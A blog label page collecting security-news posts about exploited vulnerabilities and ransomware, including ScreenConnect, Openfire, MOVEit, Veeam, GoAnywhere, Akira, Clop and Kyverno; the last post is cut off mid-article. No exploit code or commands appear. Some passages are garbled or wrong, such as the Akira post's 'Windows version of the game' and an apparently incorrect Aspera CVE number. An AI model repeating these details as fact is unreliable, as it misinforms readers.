Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Vulnerability. Show all posts
Vulnerability
ConnectWise ScreenConnect Cyber Security Cybersecurity Mass Exploitation Ransomware remote desktop management Supply Chain Attack Vulnerability

Ransomware Distributed Through Mass Exploitation of ConnectWise ScreenConnect

 

Shortly after reports emerged regarding a significant security flaw in the ConnectWise ScreenConnect remote desktop management service, researchers are sounding the alarm about a potential large-scale supply chain attack.

Kyle Hanslovan, CEO of Huntress, expressed concerns about the exploitation of these vulnerabilities, warning that hackers could potentially infiltrate thousands of servers controlling numerous endpoints. He cautioned that this could lead to what might become the most significant cybersecurity incident of 2024. ScreenConnect's functionality, often used by tech support and others for remote authentication, poses a risk of unauthorized access to critical endpoints.

Compounding the issue is the widespread adoption of ScreenConnect by managed service providers (MSPs) to connect with customer environments. This mirrors previous incidents like the Kaseya attacks in 2021, where MSPs were exploited for broader access to downstream systems.

ConnectWise addressed the vulnerabilities without assigning CVEs initially, but subsequent proof-of-concept exploits emerged swiftly. By Tuesday, ConnectWise acknowledged active cyberattacks exploiting these bugs, and by Wednesday, multiple researchers reported increasing cyber activity.

The vulnerabilities now have designated CVEs, including a severe authentication bypass flaw (CVE-2024-1709) and a path traversal issue (CVE-2024-1708) enabling unauthorized file access.

The Shadowserver Foundation reported thousands of vulnerable instances exposed online, primarily in the US, with significant exploitation observed in the wild.

According to Huntress researchers, initial access brokers (IABs) are leveraging these bugs to gain access to various endpoints, intending to sell this access to ransomware groups. There have been instances of ransomware attacks targeting local governments, including endpoints potentially linked to critical systems like 911 services.

Bitdefender researchers corroborated these findings, noting the use of malicious extensions to deploy downloaders capable of installing additional malware.

The US Cybersecurity and Infrastructure Security Agency (CISA) added these vulnerabilities to its Known Exploited Vulnerabilities catalog.

Mitigation measures include applying patches released with ScreenConnect version 23.9.8 and monitoring for indicators of compromise (IoCs) as advised by ConnectWise. Additionally, organizations should vigilantly observe their systems for suspicious files and activities.

ConnectWise's actions to revoke licenses for unpatched servers offer some hope, although the severity of the situation remains a concern for anyone running vulnerable versions or failing to patch promptly.
Read more »
Vulnerability
attacks Flaws Openfire Servers Risk Vulnerabilities and Exploits Vulnerability

Recent Vulnerability Puts 3,000 Openfire Servers at Risk of Attack

More than 3,000 instances of Openfire servers have not undergone patching to address a recent vulnerability, leaving them susceptible to potential attacks exploiting a newly discovered exploit, according to a report by VulnCheck, a firm specializing in vulnerability intelligence.

Openfire, developed by Ignite Realtime, functions as a cross-platform real-time collaboration server written in Java. Operating on the XMPP protocol, it allows web interface administration.

The vulnerability, identified as CVE-2023-32315, is classified as high-severity and pertains to Openfire's administration console. It is characterized as a path traversal flaw within the setup environment, enabling unauthorized attackers to gain entry to restricted sections of the admin console.

The root of the problem stems from Openfire's inadequate protection against specific non-standard URL encoding for UTF-16 characters. The webserver's lack of support for these characters allowed the inclusion of the new encoding without an accompanying update to the protection measures.

All iterations of Openfire, starting from version 3.10.0 launched in April 2015 up to versions 4.7.5 and 4.6.8 issued in May 2023 for vulnerability remediation, are impacted by this flaw.

Exploitations of this vulnerability have been observed over a span of more than two months. Cyber threat actors have been establishing fresh user accounts in the admin console to introduce a new plugin. This plugin houses a remote web shell, affording the attackers the ability to execute arbitrary commands and infiltrate server data.

Publicly available exploits targeting CVE-2023-32315 adhere to a uniform pattern. However, VulnCheck asserts the identification of a novel exploit path that doesn't necessitate the creation of an administrative user account.

VulnCheck has identified a total of over 6,300 accessible Openfire servers on the internet. Of these, around half have either been patched against the vulnerability, run non-vulnerable older versions, or are divergent forks that might remain unaffected.

The firm highlights that approximately 50% of externally facing Openfire servers operate on the impacted versions. Despite their relatively small number, the firm underscores the significance of this issue due to the trusted role these servers hold in connection with chat clients.

The vulnerability's implications allow an attacker lacking authentication to access the plugin administration endpoint. This provides the attacker with the capability to directly upload the plugin and subsequently access the web shell, all without authentication.

VulnCheck clarifies that this strategy avoids triggering login notifications in the security audit log, ensuring a discreet operation. The absence of a security audit log entry is notable, as it eliminates evidence of the breach. 

While signs of malicious activity might be present in the openfire.log file, the attacker can exploit the path traversal to eliminate the log through the web shell. This leaves the plugin as the sole compromise indicator, an aspect of the situation that VulnCheck warns about.

“This vulnerability has already been exploited in the wild, likely even by a well-known botnet. With plenty of vulnerable internet-facing systems, we assume exploitation will continue into the future,” VulnCheck concludes.

Read more »
Vulnerability
Australia Breach Customer Cyber Attacks Data Energy Experts Investigation Ransomware Report Security Software threat UK Vulnerability

Cyberattack Strikes Australian Energy Software Company Energy One

 

Energy One, an Australian company specializing in software solutions and services for the energy industry, has fallen victim to a cyber assault.

In an announcement made on Monday, the company revealed that the breach was identified on August 18 and had repercussions for certain internal systems both in Australia and the United Kingdom.

“As part of its work to ensure customer security, Energy One has disabled some links between its corporate and customer-facing systems,” Energy One said.

Energy One is actively engaged in an inquiry to ascertain the extent of the impact on customer-related systems and personal data. The organization is also committed to tracing the initial point of intrusion employed by the attacker.

Though detailed specifics about the attack are presently undisclosed, the company's official statement strongly suggests the possibility of a deliberate ransomware attack.

To facilitate the investigation, cybersecurity specialists have been enlisted, and competent authorities in both Australia and the UK have been informed about the incident.

According to a recent report by Searchlight Cyber, a British threat intelligence firm, malevolent actors have been peddling opportunities for initial access into energy sector enterprises globally, with prices ranging from $20 to $2,500.

Perpetrators of cybercrime can exploit various avenues, including Remote Desktop Protocol (RDP) access, compromised login credentials, and vulnerabilities in devices like Fortinet products.
Read more »
Vulnerability
CISO Cyber Attacks Data Exploits Ransomware Safety Security Vulnerability

This Ransomware Targets Several English-Speaking Nations

 

According to findings by Cisco Talos, a group of researchers, a fresh variant of ransomware is suspected to be employed in a series of attacks on entities situated in China, Vietnam, Bulgaria, and a number of English-speaking nations. 

The cybersecurity experts disclosed on Monday that they have come across a hitherto unidentified threat actor, reportedly based in Vietnam, who has been launching these attacks since as far back as June 4.

This newly identified malware is a modified version of the Yashma ransomware. It's worth noting that the Yashma strain had become significantly less active following the release of a decryption tool last year.

“Talos assesses with high confidence that this threat actor is targeting victims in English-speaking countries, Bulgaria, China and Vietnam, as the actor’s GitHub account, ‘nguyenvietphat,’ has ransomware notes written in these countries’ languages. The presence of an English version could indicate the actor intends to target a wide range of geographic areas,” the researchers said in a report.

“The threat actor may be of Vietnamese origin because their GitHub account name and email contact on the ransomware notes spoofs a legitimate Vietnamese organization’s name. The ransom note also asks victims to contact them between 7 and 11 p.m. UTC+7, which overlaps with Vietnam’s time zone.”

The perpetrator's ransom note closely resembles that of WannaCry, a notorious ransomware that gained widespread attention in 2017 due to its high-profile attacks. The ransom note is available in multiple languages, including English, Bulgarian, Vietnamese, and Chinese.

If victims fail to make the payment within three days, the ransom amount will double. The attackers have provided a Gmail address for communication. Interestingly, the ransom note lacks a specified ransom amount, and the Bitcoin account shared in the note doesn't contain any funds, suggesting that the operation might still be in its early stages.

Upon encrypting victim systems, the wallpaper is changed to display a message asserting that all files have been encrypted.

According to Cisco Talos, the Yashma ransomware is essentially a rebranded version of Chaos ransomware, which first emerged in May 2022. After a thorough examination of Yashma's features by BlackBerry security researchers last year, Cisco Talos observed that the new variant mostly retains the core elements of the original ransomware.

One significant change highlighted by Cisco Talos is that this new variant no longer embeds the ransom note within the ransomware itself. Instead, it retrieves the ransom note from a GitHub repository controlled by the threat actors. This modification is intended to evade endpoint detection solutions and antivirus software, which typically detect ransom note strings embedded in the binary.

Another noteworthy characteristic preserved in this variant is Yashma's anti-recovery capability. This involves wiping the content of the original unencrypted files, replacing them with a single character '?' before deleting the file altogether. This tactic complicates efforts by incident responders and forensic analysts to recover deleted files from the victim's hard drive.

Various organizations monitoring ransomware attacks have noted a substantial increase in the emergence of different strains. FortiGuard Labs reported a significant uptick in the growth of ransomware variants, largely attributed to the adoption of Ransomware-as-a-Service (RaaS).

Ransomware expert Allan Liska from Recorded Future pointed out that many so-called "new" ransomware strains are essentially variations of previously released versions. Data gathered by his team demonstrated that fewer than 25% of the supposed 328 "new" ransomware variants are genuinely novel.
Read more »
Vulnerability
Cyber Attacks Cyberfrauds Cybersecurity Hacking Linux Encryptor Ransomwares VMware Vulnerability

ESXi Servers are Targeted by Linux-Based Akira Ransomware

 


As part of a ransomware operation called Akira, VMware ESXi virtual machines have been encrypted using a Linux encryption tool. This is to block access to the virtual machines. The attack comes after the company targeted Windows systems for a couple of months. 

To encrypt VMware ESXi virtual machines in double-extortion attacks against companies worldwide, the Akira ransomware operations use a Linux encryptor to encrypt VMware ESXi virtual machines controlled by VMware. 

There has been a recent expansion of the Akira ransomware and it now targets VMware ESXi virtual machines using a Linux encryptor. It is because of this adaptation that Akira can now attack companies across the globe. 

This ransomware virus, Akira, was found in March 2023. As the most recent addition to the ransomware landscape, it is relatively less well-known. 

In the short time that Akira ransomware has been in operation, it has been confirmed that 45 organizations have been affected. Most of the targets are based in the U.S. Organizations affected range from childcare centers to large financial institutions but all have been affected. 

The threat actors are engaged in double extortion attacks against their victims, demanding several million dollars and stealing data from breached networks, encrypting files, and encrypting the data until they reach the point of demanding payouts.

In addition to asset managers, the gang's blog lists several victims of the gang's crimes. Akira will encrypt the files of an organization after an attack has been launched, appending the name of the encrypted files to the file names. The desktop screen will display a ransom note, explaining in a condescending tone that it is the quickest way back to the state where the company functions normally if you pay the ransom. 

The Development Bank of Southern Africa and London Capital Group are completely aware of the damage they have caused. There are many US-based companies on the gang's black web blog. 

This computer virus, known as Akira, uses double extortion techniques to pressure its victims into paying a ransom. This means that Akira copies the data before encrypting it to make sure the information can not be released, as well as selling the description key, and using these techniques to force a company into paying the ransom. 

In some cases, the ransoms amount to more than a million dollars, while in others it is less. It has focused on professional services, education, manufacturing, and research and development so far.

In sectors as diverse as education and finance, the threat of ransomware has disrupted corporate networks and encrypted stolen data from breached networks. These compromised files are marked with the extension .akira, which signifies compromise. 

It is important to note that, after the Akira ransomware has been activated, many different file extensions and names will become encrypted, as well as renamed files with the .akira extension. There will also be a ransom note titled akira_readme.txt left in each folder on the encrypted device. 

It is possible to customize how Akira works on Linux, which includes specifying the percentage of data that will be encrypted on each file, which allows threat actors to better customize their attacks. The propensity of this version of Akira to skip folders and files that are usually associated with Windows seems to indicate that it has been ported from the Windows version of the game.

Despite Akira's increasing scope, the fact that the threat now faces organizations around the world illustrates the urgency of action. Sadly, ransomware groups are increasingly expanding their operations to include Linux platforms as well. Many of them are leveraging readily available tools to do so due to the trend toward expanding their operations. To maximize their profits, they have turned this strategy into a simple and lucrative one. 

Among the most notable ransomware operations, some of which predominantly target VMware ESXi servers with their ransomware encryptors, include Royal, Black Basta, LockBit, BlackMatter, AvosLocker, HelloKitty, RansomEXX, and Hive. These operations use Linux-based encryption methods. 

Spreads Rapidly, is Widely Popular, and is Unsecured 

During a ransomware attack, servers are popular due to their ability to spread ransomware rapidly. Hackers need only one run to launch the ransomware attack, which means the ransomware attack becomes extremely fast for the first time in history. ESXi servers have gained popularity in the enterprise world, as they are among the most widely used hypervisors on the planet. Lastly, the devices do not have any security solutions installed on them, which leads to a lack of security. CrowdStrike published a report previously that focused on the fact that antivirus software simply isn't supported by the manufacturer. 

During the weekend of February 2-6, ESXi servers were targeted by thousands of attacks taking place simultaneously. The attackers were able to exploit an outdated vulnerability that had existed two years ago. As a result, good cyber security for servers is very important because research can take a long time and is not always easy. A problem that had not yet been exploited massively had been discovered by Mandiant in 2022, but the problem was still unknown.
Read more »
Vulnerability
CISA Clop Ransomware Cyberattacks Cybersecurity ID malware MOVIEit Ransomeware Vulnerability

Uncovered: Clop Ransomware's Lengthy Zero-Day Testing on the MOVEit Platform

 


Security experts have uncovered shocking evidence that the notorious Clop ransomware group has been spending extensive amounts of time testing zero-day vulnerabilities on the popular MOVEit platform since 2021, according to recent reports. This study has raised a lot of concerns about cybersecurity systems' vulnerability. For this reason, affected organizations and security agencies have taken urgent action to prevent these vulnerabilities. In light of this discovery, it only highlights the fact that ransomware attacks are becoming increasingly sophisticated. The need for robust defense measures to mitigate various types of cyber threats is critical. 

There is now close work collaboration between authorities and the parties affected by the breach to investigate this incident and develop appropriate countermeasures. 

A recent Clop data theft attack aimed at weak MOVEit Transfer instances was examined, and it was discovered that the technique employed by the group to deploy the recently revealed LemurLoot web shell can be matched with the technique used by the gang to target weak MOVEit Transfer instances. Using logs from some affected clients' networks, they determined which clients were affected. 

As a result of a joint advisory issued by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) regarding the active exploitation of a recently discovered critical vulnerability in Progress Software's MOVEit Transfer application, ransomware is now being dropped on the internet. 

Kroll researchers performed a forensic review of the exploit carried out by the Clop cybergang in July 2021. They determined that they may have experimented with the now-patched file transfer vulnerability (CVE-2023-34362) that month. 

BBC, British Airways, Boots, a UK drugstore chain and the Halifax provincial government are some of the organizations that have reported that their data was exfiltrated by the group at the end of last month as well as payroll company Zellis. There was a breach of employee data by three organizations, Vodafone, BBC, and Boots, which used Zellis' services to store employee data. 

The Russian-backed Clop organization, also known as Lace Tempest, TA505, and FIN11, has claimed responsibility for attacks that exploited Fortra’s GoAnywhere Managed File Transfer solution by exploiting a zero-day vulnerability. Over 130 organizations have been targeted and over one million patients' data has been compromised as a result. 

It has been reported that the MOVEit Transfer SQL injection vulnerability exploit on Wednesday was similar to a 2020-21 campaign in which the group installed a DEWMODE web shell on Accellion FTA servers in a joint advisory issued by the Federal Bureau of Investigation and the Cybersecurity and Infrastructure Security Agency. 

It has also been discovered that threat actors were testing methods for gathering and extracting sensitive data from compromised MOVEit Transfer servers as far back as April of 2022. These methods were probably using automated tools and these methods may have been used to gain access to servers. 

It is possible that actors tested access to organizations using automated means and pulled back information from MOVEit Transfer servers. This was in the weeks leading up to last month's attacks. This is in addition to the 2022 activity. They also did this to determine which organizations they were accessing using information obtained from the MOVEit Transfer servers. 

During the malicious activity, it appeared that specific MOVEit Transfer users' Organization IDs ("Org IDs") were being exfiltrated, which in turn would have allowed Clop to determine which organizations to access. 

It has been reported on Clop's website that it has claimed responsibility for the MOVEit attacks and that victims are invited to contact it until July 14 if they do not wish that their names be posted on the site. Because a ransom deal would not guarantee that the stolen data would remain secure, the company has offered examples of data that has been exfiltrated and data that has been publicly published as part of an unresolvable ransom deal. 

In a LinkedIn post, Charles Carmakal, CEO of Mandiant Consulting, expressed surprise at the number of victims MOVEit has provided. Carmakal characterized MOVEit as "overwhelming.".
Read more »
Vulnerability
Cyber Security Cybersecurity Data Backup FIN7 Veeam Backup and Replication Vulnerability

Targeted: Hackers Exploit Vulnerable Veeam Backup Servers with FIN7 Tactics

Hackers Exploit Vulnerable Veeam Backup Servers with FIN7 Tactics

Cyberattacks on vulnerable Veeam backup servers exposed online

Veeam Backup and Replication software is a popular choice for many organizations to protect their critical data. However, recent reports have revealed that hackers are targeting vulnerable Veeam backup servers that are exposed online, leaving organizations at risk of data theft and other cyberattacks. 

There is evidence that at least one group of threat actors, who have been associated with several high-profile ransomware gangs, are targeting Veeam backup servers. 

Starting from March 28th, there have been reported incidents of malicious activity and tools similar to FIN7 attacks being used to exploit a high-severity vulnerability in the Veeam Backup and Replication (VBR) software. 

This vulnerability, tracked as CVE-2023-27532, exposes encrypted credentials stored in the VBR configuration to unauthenticated users, potentially allowing unauthorized access to the backup infrastructure hosts.

The software vendor addressed the vulnerability on March 7 and offered instructions for implementing workarounds. However, on March 23, a pentesting company named Horizon3 released an exploit for CVE-2023-27532, which showed how the credentials could be extracted in plain text using an unsecured API endpoint. 

The exploit also allowed attackers to run code remotely with the highest privileges. Despite the fix, Huntress Labs reported that roughly 7,500 internet-exposed VBR hosts were still susceptible to the vulnerability.

Evidence of FIN7 tactics used in recent attacks

A recent report by cybersecurity and privacy company WithSecure reveals that attacks in late March targeted servers running Veeam Backup and Replication software that was publicly accessible. The techniques used in these attacks were similar to those previously associated with FIN7. 

The researchers deduced that the attacker exploited the CVE-2023-27532 vulnerability, given the timing of the campaign, the presence of open TCP port 9401 on compromised servers, and the vulnerable version of VBR running on the affected hosts. 

During a threat hunt exercise using telemetry data from WithSecure's Endpoint Detection and Response (EDR), the researchers discovered Veeam servers generating suspicious alerts such as sqlservr.exe spawning cmd.exe and downloading PowerShell scripts.

The reason behind the vulnerability is that some organizations use insecure configurations when setting up their Veeam backup servers, making them accessible over the Internet. Hackers can then exploit these weaknesses to gain access to sensitive data and files.

One of the most common attack methods is through brute-force attacks. In this method, hackers use automated tools to try different username and password combinations until they gain access to the Veeam backup server. They can also use other methods like social engineering or spear-phishing to get hold of credentials or trick users into installing malware on their systems.

Once the hackers have gained access, they can steal the backup files, modify or delete them, or use them to launch further attacks on the organization's systems. The impact of such attacks can be severe, causing loss of critical data, disruption to business operations, and significant financial losses.

Mitigating the risk of cyberattacks on Veeam backup servers

To prevent such attacks, organizations need to ensure that their Veeam backup servers are properly secured. This includes configuring the server to only allow access from trusted networks, implementing strong password policies, and keeping the software up-to-date with the latest security patches.

Additionally, organizations should consider implementing multi-factor authentication (MFA) to provide an extra layer of security. MFA requires users to provide more than one form of identification, such as a password and a one-time code sent to their mobile device, making it more difficult for hackers to gain access even if they have obtained login credentials.

Regular security audits and vulnerability assessments can also help identify potential weaknesses and enable organizations to take proactive measures to mitigate them before hackers can exploit them.

Veeam backup servers are a critical component of an organization's data protection strategy, and securing them should be a top priority. Organizations must take necessary steps to ensure that their Veeam backup servers are properly secured and not exposed to the internet. 

By taking these necessary steps, organizations can significantly reduce the risk of a security breach and protect their critical data from falling into the wrong hands. It is always better to be proactive and take preventive measures rather than deal with the aftermath of a cyberattack.


Read more »
Vulnerability
Aspera Faspex Cybersecurity IBM Patching Vulnerability

The Urgent Need to Address the Critical Bug in IBM's Aspera Faspex

IBM's widely used Aspera Faspex has been found to have a critical vulnerability with a 9.8 CVSS rating, which could have serious consequences for organizations using the software. This blog will discuss the vulnerability in detail and the importance of taking prompt action to mitigate the risk.

Aspera Faspex vulnerability

IBM Vulnerability | An Overview

IBM's widely used Aspera Faspex file transfer system has a serious problem. A critical bug that could allow hackers to run any code they want is being used by cybercriminals, including ransomware groups. Even though IBM has released a patch to fix the issue, many organizations have failed to install it. 

Researchers are warning that this vulnerability is being exploited, and one of their customers was recently hacked due to this problem. It's important to take immediate action to fix this vulnerability to avoid being targeted by hackers.

What is Aspera Faspex?

Aspera Faspex is a software application that provides secure file transfer capabilities to businesses and organizations. It is widely used across various industries, including media and entertainment, healthcare, finance, and government agencies.

Understanding the Vulnerability

The vulnerability (CVE-2022-5859) in Aspera Faspex version 4.1.3 and earlier versions arises from insufficient validation of user-supplied input in the software. Attackers could exploit this vulnerability by sending specially crafted data to the application, leading to arbitrary code execution. This could enable attackers to bypass authentication and execute code on the vulnerable system, which could result in significant data breaches and other security incidents.

The Impact of the Vulnerability

The vulnerability in Aspera Faspex is considered critical, with a CVSS rating of 9.8 out of 10. This means that it is highly exploitable and could have severe consequences for organizations using the software. Attackers could gain unauthorized access to sensitive data, execute malicious code, and cause significant disruptions to business operations.

The Importance of Timely Patching

IBM has recommended that organizations using the affected version of the software should upgrade to a patched version as soon as possible to address the vulnerability. Timely patching is critical in mitigating the risk of cyberattacks and data breaches. Organizations that delay patching are putting themselves at increased risk of cyberattacks and other security incidents.

The Role of Security Hygiene

In addition to timely patching, implementing robust security measures is crucial in preventing cyberattacks and minimizing the impact of security incidents. IBM has emphasized the importance of following standard security practices, including network segmentation and monitoring for unusual behavior. These security measures can help organizations detect and respond to security incidents in a timely manner.

The Significance of the Aspera Faspex Vulnerability

The Aspera Faspex vulnerability is a reminder of the importance of prioritizing security in any organization. With the evolving security landscape, organizations must remain vigilant and continuously update their security measures to mitigate the risk of cyberattacks and other security incidents. Failure to take prompt action in addressing vulnerabilities could have severe consequences for organizations, including financial losses, reputational damage, and legal implications.

Read more »
Vulnerability
Acropalypse Bug Bugs Google Image cropping Microsoft Patch Fix Sensitive Data Leak Vulnerabilities and Exploits Vulnerability

Microsoft Conduct an Emergency Fix for the Notorious ‘Acropalypse’ Bug


Recently, Microsoft has acted quickly in patching up the ‘acropalypse’ bug that was discovered earlier this week. The bug could apparently enable information cropped out of images via the Windows screenshot tools to be recovered. 

According to BleepingComputer, Microsoft has now issued an OOB (out-of-band or emergency) update that patches the aforementioned issue, technically named CVE-2023-28303. Microsoft is now urging users to apply the update as soon as possible. 

Furthermore, the update is not difficult to apply. All that the user has to do is click the Library icon in Microsoft Store, then pick Get updates (top right). Doing so will enable the patch to be applied if it has not already been installed automatically. 

Carry on Cropping 

The acropalypse bug shares some similarities with the vulnerability that targeted the Markup feature on Google Pixel phones, i.e. images and screenshots cropped in the Windows 11 Snipping Tool and the Windows 10 Snip and Sketch tool could well be compromised. 

The CVE-2023-28303 bug signifies that parts of a PNG or JPEG image that has been cropped out are not completely removed from the file after it is saved again. These cropped sections could include a variety of sensitive information, like bank account credentials or medical records. 

Moreover, it is important to note that applying the patch would not be able to fix any file that has already been cropped and exploited. It will only be applied to the ones that will be edited in the future. Users must re-crop any existing images to ensure that the excess parts of the picture have been appropriately removed. 

Analysis: A Quick Fix for a Worrying Bug 

Initially, recovering cropped out part of images may not appear to be a significantly severe security vulnerability- after all, who would care if someone manages to recover some empty sky that you have removed from that one photo from one of your vacations? 

However, there are a lot of reasons that makes cropping is a serious problem, as tech journalists know all too well. One could compromise their personal and important information from these cropped images, like email address, bank account numbers and contact details. Thus, it is well advised to users to cut off any information as such information before sharing it widely over the internet. 

In today’s era, where one shares so many photos with others and on the web at large, it is important from a security perspective that these images do not, in any way, expose more than we want them to, something that was a case of concern with CVE-2023-28303. 

Although, Microsoft has acted quickly to patch the issue, it is still concerning to note that the same bug was being exposed to two completely separated software from both Microsoft and Google in recent days.  

Read more »
Vulnerability
Cyber Crime Cyberattacks Data Breach Hackers Hatch Bank MFT Secure Software Vulnerability

A GoAnywhere MFT hack Exposes Hatch Bank's Data Breach


 

Hackers exploited a zero-day vulnerability in Hatch Bank's internal file transfer software, allowing access to thousands of Social Security numbers from customers, according to Hatch Bank, a digital-first bank that provides infrastructure for fintech companies offering their brand credit cards. 

According to Hatch Bank, security breaches have affected almost 140,000 customers as hackers were able to access sensitive customer information from its Fortra GoAnywhere MFT secure file-sharing platform, which allows customers to access their online accounts from anywhere. 

In addition to providing small businesses with access to a variety of banking services, Hatch Bank is also a financial technology company. 

TechCrunch reported today that 139,493 of the customer data of someone impacted by a data breach had been stolen by hackers who exploited a vulnerability in GoAnywhere MFT software which was submitted to the Attorney General's office for investigation. 

Fortran experienced a cyber incident on January 29, 2023, after discovering that there was a vulnerability in their software. Based on the notification that Hatch Bank sent out, the company experienced a cyber incident. 

Fortra notified Hatch Bank of the incident on February 3, 2023, informing them that files contained on Fortra's GoAnywhere site had been compromised. According to Hatch, they were able to get hold of the data stolen and conducted a review of the data and found that the attackers had gotten hold of customer names as well as social security numbers. 

Affected customers of the bank are entitled to a free twelve-month credit monitoring service from the bank as part of their compensation package. 

Earlier this month, Community Health Systems (CHS) revealed it had suffered a data breach caused by the GoAnywhere MFT attack, making this the second confirmed breach in the past month. 

GoAnywhere Breaches Linked to Clop Ransomware

Despite Hatch Bank not disclosing which threat actor was responsible for the attack, BleepingComputer was told that the Clop ransomware gang conducted these attacks. 

Approximately 130 organizations were breached and their data was stolen. It has been claimed that Fortra's GoAnywhere MFT platform was exploited by the ransomware group to steal data for over ten days, exploiting the zero-day vulnerability in its platform. 

There is now a CVE-2023-0669 vulnerability that is being tracked and allows remote threat actors to access servers through a remote code execution vulnerability. After learning that the vulnerability in GoAnywhere was being actively exploited in attacks, GoAnywhere disclosed its vulnerability to its customers in early February. 

It was revealed that there was an exploit exploited in the platform on February 7th, only a day before it was patched. 

Fortra did not respond to our emails requesting more information about the attacks, and BleepingComputer was unable to independently confirm Clop's assertions that the attackers were behind them. 

It has been discovered that the GoAnywhere MFT was also linked to TA505, the hacking group well known for the deployment of Clop ransomware, according to Huntress Threat Intelligence Manager Joe Slowik. 

In December 2020, Clop utilized a similar tactic to steal data from companies worldwide by exploiting a zero-day vulnerability in Accellion's File Transfer Appliance (FTA) system, and the hacker was identified as Clop. 

With Accellion FTA, organizations have a secure way of sharing files with their clients, much like they would with GoAnywhere MFT. 

The Clop ransomware gang gave an ultimatum to the victims of these attacks, demanding a $10 million ransom in return. Data was intended to be protected from being published because it had been stolen. 

Numerous organizations have disclosed related breaches; Morgan Stanley, Qualys, Shell, and Kroger are a few of the most notable companies that published their reports related to the Accellion FTA attacks. Several other universities around the world, including Stanford Medicine, the University of Colorado, UCLA, and the University of Colorado-Boulder were also affected by the incident. 

In the event of a GoAnywhere MFT attack, Clop may well demand a similar ransom from those who are attacked by his code. The stolen data, however, will soon appear on the data leak site of the gang if the gang follows similar tactics in the future.
Read more »
Vulnerability
Bug Clop Ransomware Cyber Security Flaws Ransomware Vulnerability

Clop Ransomware Flaw Permitted Linux Victims to Restore Files for Months

 

The first Linux version of the Clop ransomware has been discovered in the wild, but with a flawed encryption algorithm that enables the process to be reverse-engineered. 

"The ELF executable contains a flawed encryption algorithm making it possible to decrypt locked files without paying the ransom," SentinelOne researcher Antonis Terefos said in a report shared with The Hacker News.

The cybersecurity firm, which has created a decryptor available, stated that it discovered the ELF version on December 26, 2022, while also mentioning similarities to the Windows flavor in terms of employing the same encryption method. Around the same time, the detected sample is said to be a component of a larger attack targeting educational institutions in Colombia, including La Salle University. As per FalconFeedsio, the university was added to the criminal group's leak site in early January 2023.

The Clop (stylized as Cl0p) ransomware operation, which has been active since 2019, dealt a major blow in June 2021 when six members of the group were arrested by police as part of an international law enforcement operation codenamed Operation Cyclone.

However, the cybercrime group made a "explosive and unexpected" comeback in early 2022, claiming dozens of victims from the industrial and technology sectors. SentinelOne classified the Linux version as an early-stage version due to the absence of some functions found in the Windows counterpart.

This lack of feature parity is also explained by the malware authors' decision to create a custom Linux payload rather than simply porting over the Windows version, implying that future Clop variants may close the gap.

"A reason for this could be that the threat actor has not needed to dedicate time and resources to improve obfuscation or evasiveness due to the fact that it is currently undetected by all 64 security engines on VirusTotal," Terefos explained.

The Linux version is intended to encrypt specific folders and file types, with the ransomware containing a hard-coded master key that can be used to recover the original files without paying the threat actors. If anything, the development indicates a growing trend of threat actors branching out beyond Windows to target other platforms.

Terefos concluded, "While the Linux-flavored variation of Cl0p is, at this time, in its infancy, its development and the almost ubiquitous use of Linux in servers and cloud workloads suggests that defenders should expect to see more Linux-targeted ransomware campaigns going forward," 
Read more »
Vulnerability
Apple data security Flaws Government iPhone Mobile Phones Safety User Vulnerability

Government Issues High-risk Warning for iPhone Users

 

Apple iPhones are known for their strength and security features. The Cupertino-based tech behemoth releases security updates for its devices on a regular basis. Although Apple recommends that people install the most recent builds of iOS on their iPhones in order to have a more protected and feature-rich operating system, older iPhone models are incapable to deploy the most recent updates due to hardware limitations. 

Some users prefer to run older versions of iOS for simplicity of use, but it's important to note that older iOS versions are easier to exploit. One such flaw has been discovered in Apple's iOS, and the Indian government has issued a warning to iPhone users.

According to the Indian Computer Emergency Response Team (CERT-In) of the Ministry of Electronics and Information Technology, a vulnerability in iOS has been disclosed that could permit an attacker to implement arbitrary code on the targeted device. Apple iOS versions prior to 12.5.7 are vulnerable for iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation).

This vulnerability exists in Apple IOS due to a type of confusion flaw in the WebKit component, according to CERT-In. An attacker could utilize this vulnerability by luring the victim to a maliciously crafted website. An attacker who successfully exploits this vulnerability may be able to execute arbitrary code on the targeted system. 

The security flaw is actively being exploited against iOS versions prior to iOS 15.1. To avoid being duped, install the new iOS 12.5.7 patch, which Apple released earlier this week.
Read more »
Vulnerability
Kubernetes Kyverno Vulnerabilities and Exploits Vulnerability

Kubernetes can be Hacked due to a Container Verification Bug

 


An extremely serious vulnerability in the Kyverno admission controller for container images could permit malicious actors to import a raft of malicious code into the production environments of cloud providers by exploiting this vulnerability. 

Using the Kyverno admission controller, the ability to verify signatures is provided as a mechanism for ensuring that only validated and signed containers are pulled into a given cluster running Kubernetes. Many potentially disastrous scenarios can be averted by doing this. There are a lot of malicious payloads that can be found in booby-trapped container images. These include cryptominers, rootkits, container escapes, lateral movement exploit kits, credential stealers, and more. 

However, there is a bug (CVE-2022-47633) that can be exploited to undermine the functionality of this mechanism. It has been revealed that an attacker could take advantage of this vulnerability and inject unsigned images into any protected cluster, bypassing the policy of image verification. This was stated in a blog post on Dec. 21 by researchers at ARMO. 

There are high stakes here: an attacker can effectively take control of a victim's pod, and let themselves access all of the assets, credentials, and service account tokens of the pod, including the token of the service account, used to access the API server, the researchers cautioned. 

Taking advantage of the vulnerability, one can completely bypass the verification process for image signatures. This gives an attacker a wide range of target options when it comes to an attack on a Kubernetes cluster. Ben Hirschberg, CTO, and co-founder of ARMO describe how any workload can mount cluster secrets and data volumes. By having access to the vulnerability of the Kubernetes cluster of the victim of the attack, the attacker can inject code into the cluster. This code steals data and credentials from the cluster. Additionally, the attacker is also able to inject his or her own code, thus allowing the attacker to take advantage of the victim's CPU for cryptocurrency mining. 

Subverting the Container Admission Controller: An inside look at the bug 

When a new workload is requested from a Kubernetes API server that is defined via an image with a tag, that API server sends a request to the Kyverno admission controller to validate the new workload as defined in the image. 

There are several ways in which the admission controller determines whether a workload is admissible to the cluster. This includes requesting the image manifest and the container registry's signature.

The container runtime starts a new workload based on the image. This is true if the image is checked out, and if the image is not checked out, the image does not proceed. 

According to the advisory, the vulnerability was discovered as a result of the controller's signature validation process downloading the image manifest twice - but only verifying the signature for one of those downloads. 

Hence, the attack looks like this: a malicious registry or proxy is used to socially engineer an administrator into pulling a container image from an infected registry or proxy. In the initial import of the malicious registry file, the admission controller receives a valid, benign, signed image that has been imported by the malicious registry. As of now, everything seems to be working well. 

